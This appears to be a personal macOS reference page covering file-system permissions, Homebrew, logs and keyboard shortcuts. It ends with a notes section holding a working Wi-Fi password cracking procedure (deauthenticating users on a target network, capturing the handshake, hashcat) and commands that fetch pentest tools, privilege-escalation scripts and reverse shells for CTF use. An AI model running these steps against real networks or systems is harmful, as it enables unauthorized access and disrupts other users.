macOS#
Table of Contents#
App |
UI |
macOS |
Windows |
|---|---|---|---|
File Manager |
GUI |
||
Shell/CLI |
TUI |
||
Terminal |
GUI |
||
Text Editor |
GUI |
/Users/<user>/anaconda3 # graphical install
/Users/<user>/opt/anaconda3 # shell install
MongoDB
PostgreSQL
Documentation#
[ d ] Terminal User Guide
[ d ] About Daemons and Services
[ d ] Scheduling Timed Jobs
[ d ] Automate tasks using AppleScript and Terminal on Mac
[ d ] Change Profiles Shell settings in Terminal on Mac
[ d ] Intro to shell scripts in Terminal on Mac
[ d ] Shell Scripting Primer
[ d ] Keyboard shortcuts in Terminal on Mac
[ d ] Make a file executable in Terminal on Mac
[ d ] Open or quit Terminal on Mac
[ d ] Schedule your Mac to turn on or off in Terminal
[ d ] Script management with launchd in Terminal on Mac
[ d ] Specify default and startup Terminal window profiles on Mac
[ d ] Use command-line text editors in Terminal on Mac
[ d ] Use profiles to change the look of Terminal windows on Mac
User Guide
[ d ] Set when your Mac shuts down while using a UPS
sudo launchctl config user umask nnnsudo launchctl config system umask nnnsudo mkdir -m 755 /private/var/db/com.apple.xpc.launchd/configIf Terminal responds “Could not write configuration: No such file or directory”.default umask value: 022; default file value: 666; default folder value: 777
Homebrew Package Manager
brew
brew -hHow do I use commandbrew?brew -vWhat is the Homebrew version?
File System#
The native graphical file explorer application on macOS is Finder.
The tilde ~ is an abbreviation for the user’s home directory /Users/USERNAME.
Some important user-level resources.
~
├── .bashrc # config file: Bash shell
├── .condarc # config file: Conda package manager
├── .gitconfig # config file: Git version control system
├── .jupyter
│ ├── jupyter_lab_config.py
│ └── lab
├── .ssh
│ ├── id_ed25519 # SSH key pair: private key
│ └── id_ed25519.pub # SSH key pair: public key
├── .vimrc # config file: Vim text editor
├── .zshrc # config file: Z shell
│
├── Applications # standard user directories
├── Desktop
├── Documents
└── Downloads
File System Permissions and ACLs
chgrp- change groupchmod- change file modes or Access Control Listschown- change file owner and groupchpass,chfn,chsh- add or change user database informationdscl- Directory Service command line utilitygroups- show group membershipsid- return user identitylogin- log into the computerpasswd- modify a user’s passwordsusudoumaskusersvisudoxattr
Permissions
chown
delete
readattr
readextattr
readsecurity
writeattr
writeextattr
writesecurity
Directory Permissions
add_file
add_subdirectory
delete_child
list
search
Non Directory Permissions
append
execute
read
write
ACL Inheritance
directory_inherit
file_inherit
limit_inherit
only_inherit
/usr/libexec/ApplicationFirewall/socketfilterfw
/usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate --getblockall --getallowsigned --getstealthmode/usr/libexec/ApplicationFirewall/socketfilterfw --listapps
Package Management#
brew --version
brew upgrade && brew update && brew cleanup
brew search ansible
brew info ansible
GNU Utilities#
brew install autoconf
brew install bash
brew install binutils
brew install coreutils
brew install diffutils
brew install ed
brew install findutils
brew install flex
brew install gawk
brew install gnu-indent
brew install gnu-sed
brew install gnu-tar
brew install gnu-which
brew install gpatch
brew install grep
brew install gzip
brew install less
brew install m4
brew install make
brew install nano
brew install screen
brew install watch
brew install wdiff
brew install wget
brew isntall zip
Logs#
/var/log # unix-ish system-wide event logs (apps stored in `/usr/local` or `/opt`)
/var/log/system.log # system log
/var/log/DiagnosticMessages # mac analytics
/Library/Logs # mac-ish system-wide event logs
/Library/Logs/Diagnosticreports # system reports
~/Library/Logs # user app logs
~/Library/Logs/DiagnosticReports # user reports
man log
man logger
man syslog
resources
Cron#
Grant /usr/sbin/cron full disk access via Settings -> Privacy and Security -> Full Disk Access -> + -> Cmd-Shift-G -> /usr/sbin/cron.
Magic Number#
/usr/share/file/magic
// helloworld.c
#include <stdio.h>
int main () {
printf("Hello World!\n");
return 0;
}
gcc helloworld.c -o helloworld
xxd -s0 -l4 -e helloworld # little-endian
00000000: feedfacf ....
Keyboard Shortcuts#
[ d ] Mac keyboard shortcuts
Ctrl + Shift + - split cell
Option + Right go right one word
Option + Left go left one word
Command + Up go to cell start
Command + Down go to cell end
Command + z undo
Command + Shift + z redo
Command + ] indend
Command + [ dedent
Command + a select all
Option + delete delete preceding word
Command + delete delete preceding line
Shortcut |
Graphical |
Action |
|---|---|---|
Cmd-Right |
⌘→ |
Jump to the last/rightmost column |
Cmd-Left |
⌘← |
Jump to the first/leftmost column |
Cmd-Up |
⌘↑ |
Jump to the first/topmost row |
Cmd-Down |
⌘↓ |
Jump to the last/bottommost row |
Cmd-z |
⌘z |
Undo |
Cmd-s |
⌘s |
Save |
Cmd-c |
⌘c |
Copy |
Cmd-v |
⌘v |
Paste |
Cmd-f |
⌘f |
Search |
Cmd-a |
⌘a |
Select All |
Cursor
Shortcut |
Graphical |
Action |
|---|---|---|
Cmd-Up |
⌘↑ |
Move the insertion point to the beginning of the document |
Cmd-Down |
⌘↓ |
Move the insertion point to the end of the document |
Cmd-Left |
⌘← |
Move the insertion point to the beginning of the line |
Cmd-Right |
⌘→ |
Move the insertion point to the end of the line |
Opt-Left |
⌥← |
Move the insertion point to the beginning of the previous word |
Opt-Right |
⌥→ |
Move the insertion point to the end of the next word |
Ctrl-A |
⌃A |
Move to the beginning of the line |
Ctrl-E |
⌃E |
Move to the end of the line |
Ctrl-F |
⌃F |
Move one character forward |
Ctrl-B |
⌃B |
Move one character backward |
Ctrl-L |
⌃L |
Center the cursor |
Ctrl-P |
⌃P |
Move up one line |
Ctrl-N |
⌃N |
Move down one line |
Ctrl-A Move the cursor to the beginning of the line
Ctrl-E Move the cursor to the end of the line
Ctrl-K delete everything after the cursor
Ctrl-U delete entire line
Ctrl-D delete character
Ctrl-W delete word
Ctrl-Y get last command
Ctrl-_ undo
Copy-Paste
Shortcut |
Graphical |
Action |
|---|---|---|
Cmd-X |
⌘X |
Cut & Copy |
Cmd-C |
⌘C |
Copy |
Cmd-V |
⌘V |
Paste |
Cmd-Z |
⌘Z |
Undo |
Shift-Cmd-Z |
⇧⌘Z |
Redo |
Deletion
Shortcut |
Action |
|---|---|
Opt-Del |
Delete the word to the left of the insertion point |
Del, Ctrl-H |
Delete the character to the left of the insertion point |
Ctrl-D |
Delete the character to the right of the insertion point |
Ctrl-K |
Delete the text between the insertion point and the end of the line or paragraph |
Selection
Shortcut |
Action |
Description |
|---|---|---|
Cmd-A |
Select all |
|
Shift-Cmd-Up |
Current to top |
Select the text between the insertion point and the beginning of the document |
Shift-Cmd-Down |
Current to bottom |
Select the text between the insertion point and the end of the document |
Shift-Cmd-Left |
Current to line start |
Select the text between the insertion point and the beginning of the current line |
Shift-Cmd-Right |
Current to line end |
Select the text between the insertion point and the end of the current line |
Shift-Up |
Current to line up |
Extend text selection to the nearest character at the same horizontal location on the line above |
Shift-Down |
Current to line down |
Extend text selection to the nearest character at the same horizontal location on the line below |
Shift-Left |
Current to previous character |
Extend text Selection one character to the left |
Shift-Right |
Current to next character |
Extend text selection one character to the right |
Opt-Shift-Up |
Extend text selection to the beginning of the current paragraph, then to the beginning of the following paragraph if pressed again |
|
Opt-Shift-Down |
Extend text selection to the end of the current paragraph, then to the end of the following paragraph if pressed again |
|
Opt-Shift-Left |
Extend text selection to the beginning of the current word, then to the beginning of the following word if pressed again |
|
Opt-Shift-Right |
Extend text selection to the end of the current word, then to the end of the following word if pressed again |
Other
Shortcut |
Action |
|---|---|
Ctrl-O |
Insert a new line after the insertion point |
Ctrl-T |
Swap the character behind the insertion point with the character in front of the insertion point |
Cmd-{ |
Left align |
Cmd-} |
Right align |
Shift-Cmd-| |
Center align |
Shortcut |
Action |
|---|---|
Find |
Cmd-F |
Find Again, next occurrence |
Cmd-G |
Find Again, previous occurrence |
Shift-Cmd-G |
Hide the windows of the front app |
Cmd-H |
Hide the windows of all other apps other than the front app |
Opt-Cmd-H |
Minimize the front window |
Cmd-M |
Open the selected item or select a file to open |
Cmd-O |
Cmd-P |
|
Save |
Cmd-S |
New tab |
Cmd-T |
Close the front window |
Cmd-W |
Close all the windows of the front app |
Opt-Cmd-W |
Minimize all windows of the front app |
Opt-Cmd-W |
Force quit an app |
Opt-Cmd-Esc |
Show-hide the search utility |
Cmd-Space |
Show Character Viewer |
Ctrl-Cmd-Space |
Full screen app |
Ctrl-Cmd-F |
Switch to the most recently used app among open apps |
Cmd-Tab, Shift-Cmd-Tab |
Take a screenshot or screen recording |
Shift-Cmd-5 |
Take a screenshot |
Shift-Cmd-4 |
Take a screenshot immediately |
Shift-Cmd-3 |
Create new |
Cmd-N |
Create new folder |
Shift-Cmd-N |
Open preferences for the front app |
Cmd-Comma |
iTerm2 Shortcuts#
[ d ] Keyboard shortcuts in Terminal on Mac
Textual |
Graphical |
Action |
|---|---|---|
|
⌥+LeftClick |
move the cursor to a different character in the command line |
|
⌘D |
split window vertically with current profile |
|
⇧⌘D |
split window horizontally with current profile |
|
⌥⇧⌘V |
split window vertically |
|
⌥⇧⌘H |
split window horizontally |
Tips and Tricks#
Dragging a file into the terminal automatically types the path of the file.
Resources#
[ g ] donnemartin’s macOS development environment setup
https://osxdaily.com/2013/12/06/snow-terminal-mac-os-x-command/
[ h ] menu bar
https://www.reddit.com/r/macapps/comments/13gfmf8/what_apps_do_you_have_in_your_menubar/
[ h ] Bartender
[ h ] BetterTouchTool
[ h ] Big Weather
[ h ] CleanShot
[ h ] ColorSlurp
[ h ] Dash
[ h ] Dato
[ h ] Downie
[ h ] Dropover
[ h ] Fantastical
[ h ] Gestimer
[ h ] iStat
[ h ] IntelliBar
[ h ] Itsycal
[ h ] Lookupper
[ h ] Lunar
[ h ] Lungo
[ g ] MonitorControl
[ h ] Numi
[ h ] NZB Control
[ h ] OneSwitch
[ h ] Parcel
[ h ] PixelSnap
[ h ] PopClip
[ h ] Raycast
[ h ] Rectangle
[ g ] Scenecuts
[ h ] Scrap Paper
[ g ] Stats
[ h ] Superkey
[ h ] Swish
[ h ] Tot
[ h ] Yoink
YouTube#
Linus Tech Tips
[ y ]
11-27-2023. “Apple please watch this. - Frore AirJet MacBook Air”.
NetworkChuck
[ y ]
11-21-2022. “50 macOS Tips and Tricks Using Terminal (the last one is CRAZY!)”.
Shannon Morse
[ y ]
01-31-2024. “Will Apple’s RCS Include End to End Encryption?”.
[ y ]
07-27-2015. Corey Schafer. “Mac OS X Terminal Tutorial: Time-Saving Keyboard Shortcuts”.
Terms#
[ w ] BSD Berkeley Software Distribution
[ w ] Darwin
[ w ] Graphical User Interface (GUI)
[ w ] Homebrew
[ w ] Mach
[ w ] Mach-O
[ w ] macOS
[ w ] NeXTSTEP
[ w ] Operating System (OS)
[ w ] Platform
[ w ] Platform Ecosystem
[ w ] POSIX
[ w ] PowerShell
[ w ] Preferred Executable Format (PEF)
[ w ] Text/Terminal User Interface (TUI)
[ w ] Unix
[ w ] XNU
Notes#
https://medium.com/small-tech-talk/macos-crack-wifi-passwords-134559960edd
# link airport to make it easily accessible
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
# sources, binaries, captures, dictionaries
mkdir -p hck/{src,bin,cap,dict}
#-----[ zizzania ]
cd hck/src
git clone git@github.com:cyrus-and/zizzania.git
cd zizzania
make -f config.Makefile
make
ln -s $(pwd)/src/zizzania ../../bin/zizzania
cd ../.. # back to root
#-----[ hashcat-utils ]
cd src
git clone git@github.com:hashcat/hashcat-utils.git
cd hashcat-utils/src
make
ln -s $(pwd)/cap2hccapx.bin ../../../bin/cap2hccapx
cd ../../.. # back to root
cd dict
wget http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2
bunzip rockyou.txt.bz2
cd .. # back to root
airport -s # scan available networks and choose a target
sudo airport --disassociate # dissociate the network
sudo airport --channel=<channel> # set the channel to match the target network
sudo ./bin/zizzania -i en0 -b <BSSID> -w cap/capture.pcap -v # warning: this command deauthenticates users on the target network
./bin/cap2hccapx cap/capture.pcap cap/capture.hccapx # convert capture to hccapx
hashcat -m 2500 cap/capture.hccapx dict/rockyou.txt
brew install pipx
scoop install pipx
https://medium.com/@seitzmanuel/how-to-get-your-mac-osx-ready-for-playing-ctfs-hacking-6b6801250d1e
brew install burp-suite
brew install owasp-zap
brew install ghidra
brew install wireshark
brew install nmap
brew install gobuster
brew install nikto
brew install wpscanteam/tap/wpscan
brew install metasploit
brew install exploitdb
brew install hashcat
brew install sambdabrew install binwalk
brew install exiftool
brew install aircrack-ng
brew install hydra
brew install sqlmap
git clone https://github.com/ShawnDEvans/smbmap.git
python -m pip install -r requirements.txt
ln -s smbmap/smbmap.py /usr/local/bin/smbmap
git clone https://github.com/CiscoCXSecurity/enum4linux.git
ln -s enum4linux/enum4linux.pl /usr/local/bin/enum4linux
pipx install crackmapexec
pipx install git+https://github.com/calebstewart/pwncat.git
git clone https://github.com/3ndG4me/KaliLists.git wordlists
gzip -d wordlists/rockyou.txt.gz
wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O master.zip
unzip master.zip
mv SecLists-master seclists
# chisel
wget https://github.com/jpillora/chisel/releases/download/v1.7.6/chisel_1.7.6_darwin_amd64.gz -O chisel_osx.gz
gunzip -c chisel_osx.gz > linux/chisel_osx
rm chisel_osx.gz
chmod +x linux/chisel_osx
# PEASS-ng
wget https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh -O linux/linpeas.sh
# linenum
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O linux/linenum.sh
# linux exploit suggester
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O linux/linux-exploit-suggester.sh
# lse
wget https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh -O linux/lse.sh
# pspy
wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64 -O linux/pspy64
# powerup
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -O windows/powerup.ps1
# jaws
wget https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 -O windows/jaws-enum.ps1
# print spoofer
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe -O windows/printspoof.exe
# powershells revs
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1 -O reverse_shells/invoke-powershelltcp.ps1
# php rev shell
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O reverse_shells/php-rev-shell.php